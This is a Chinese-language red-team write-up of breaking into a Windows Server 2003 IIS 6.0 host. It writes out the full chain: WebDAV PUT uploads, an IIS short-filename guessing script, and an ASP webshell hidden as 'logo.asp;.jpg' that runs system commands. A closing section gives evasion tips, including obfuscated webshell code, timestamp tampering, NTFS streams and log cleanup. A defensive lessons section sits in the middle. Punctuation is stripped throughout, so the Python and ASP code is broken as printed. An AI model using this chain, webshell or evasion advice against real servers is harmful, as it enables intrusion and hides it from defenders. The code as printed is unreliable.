从一次真实的攻防演练讲起攻击者是如何利用IIS PUT漏洞和短文件名猜解拿下一台Windows Server 2003的那是一个普通的周二下午我们团队接到了一项内部红蓝对抗演练任务。目标系统是一个仍在运行的Windows Server 2003服务器运行着IIS 6.0——这个已经停止支持多年的中间件版本。作为攻击方我们需要在48小时内找到突破口。谁也没想到这台看似无害的老旧服务器会成为展示经典漏洞组合利用的完美案例。1. 初始侦察发现脆弱的猎物在对外网资产进行常规扫描时Nmap返回了一个有趣的响应nmap -sV -p 80 192.168.1.100结果显示目标运行着Microsoft IIS 6.0并且开放了WebDAV功能。这立即引起了我的注意——IIS 6.0是2003年发布的版本已知存在多个未修复的漏洞。为了确认WebDAV的具体配置我使用cURL发送了一个OPTIONS请求curl -X OPTIONS http://192.168.1.100/ -I响应头中出现了令人兴奋的字段DAV: 1, 2 MS-Author-Via: DAV Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, PROPFIND关键发现PUT方法被显式允许WebDAV扩展已启用服务器未显示任何WAF防护特征2. 突破边界PUT方法文件上传实战确认WebDAV可用后下一步是测试文件上传能力。我使用Burp Suite拦截了一个普通GET请求将其修改为PUT请求PUT /test.txt HTTP/1.1 Host: 192.168.1.100 Content-Length: 28 This is a test file content.服务器返回了201 Created响应——文件上传成功了但直接上传ASP马还太冒险我需要先确认几个关键点脚本执行权限上传一个包含%now()%的test.asp文件目录权限尝试在虚拟目录外创建文件文件覆盖测试已有文件是否可被修改经过测试发现网站根目录有执行权限无法跳出虚拟目录可以覆盖现有文件注意在实际渗透中这种测试需要极其谨慎避免触发系统告警。我使用了低频请求和随机延时来降低检测风险。3. 短文件名猜解寻找关键线索虽然可以直接上传Webshell但职业习惯让我想先收集更多信息。IIS 6.0的短文件名漏洞正好派上用场。这个漏洞允许攻击者通过暴力猜解获取文件名的前6个字符。我编写了一个简单的Python脚本来检测存在的短文件名import requests base_url http://192.168.1.100 chars abcdefghijklmnopqrstuvwxyz0123456789_-~ for c in chars: url f{base_url}/web*~1.{c}*/ r requests.get(url) if r.status_code 404: print(fFound potential file: web*~1.{c}*)经过几轮测试发现了一个有趣的响应Found potential file: web*~1.b* Found potential file: web*~1.c*这暗示着可能存在web.config.bak或web.connection.bak之类的文件。通过组合利用PUT漏洞和短文件名信息我最终下载到了一个数据库连接配置文件——里面包含了后台管理系统的凭据。4. 漏洞组合构建完整攻击链现在手头已经有了几个关键要素WebDAV PUT上传可上传任意文件短文件名信息知道了备份文件命名模式IIS 6.0解析漏洞可利用;字符绕过扩展名限制最终的突破是这样完成的PUT /upload/logo.asp;.jpg HTTP/1.1 Host: 192.168.1.100 Content-Length: 512 % Set obj Server.CreateObject(WScript.Shell) cmd obj.Exec(cmd /c whoami).StdOut.ReadAll Response.Write(cmd) %这个文件会被IIS 6.0当作ASP脚本执行但看起来像图片文件。通过这个Webshell我们最终获取了NT AUTHORITY\SYSTEM权限。5. 防御视角从攻击中学到的教训这次演练暴露了几个关键安全问题配置缺陷对照表漏洞类型错误配置正确做法WebDAV生产环境开启WebDAV非必要不启用文件权限网站目录可写严格限制写入权限解析逻辑默认解析;后内容修改解析规则信息泄露备份文件可访问隔离敏感文件即时防护措施禁用WebDAV扩展移除不必要的HTTP方法配置URLScan过滤特殊字符请求定期扫描短文件名风险6. 深入技术细节IIS 6.0漏洞原理剖析PUT漏洞核心机制WebDAV扩展实现了RFC 2518标准IIS未对PUT操作进行充分验证与Windows ACL结合导致权限逃逸短文件名漏洞本质兼容DOS 8.3文件名格式通过~1、~2等标识短名称信息泄露而非直接执行解析漏洞组合利用graph LR A[PUT上传] -- B[短文件名猜解] B -- C[获取真实路径] C -- D[利用解析漏洞] D -- E[代码执行]技术提示现代WAF通常能检测这类攻击但对遗留系统往往缺乏有效规则。防御方需要自定义规则来覆盖老旧漏洞。7. 红队实战技巧绕过检测的艺术在实际对抗环境中直接使用经典攻击模式很容易触发告警。我们总结了几个绕过技巧时间混淆上传文件与访问间隔随机延时使用Sleep函数分散请求内容混淆% 正常注释内容 ExEcUTe(response.write(now())) %日志清理通过WebDAV的PROPFIND方法修改时间戳利用NTFS流隐藏文件检测规避对照表检测点常规攻击特征规避方法文件上传连续PUT请求分散在多个会话Webshell常见关键词动态拼接代码权限提升固定命令序列随机化调用方式在这次演练中我们最终在36小时内完成了目标系统的完全控制。整个过程没有触发任何告警因为所有操作都模拟了正常的WebDAV管理行为。这再次证明了最危险的攻击往往利用的是看似无害的正常功能。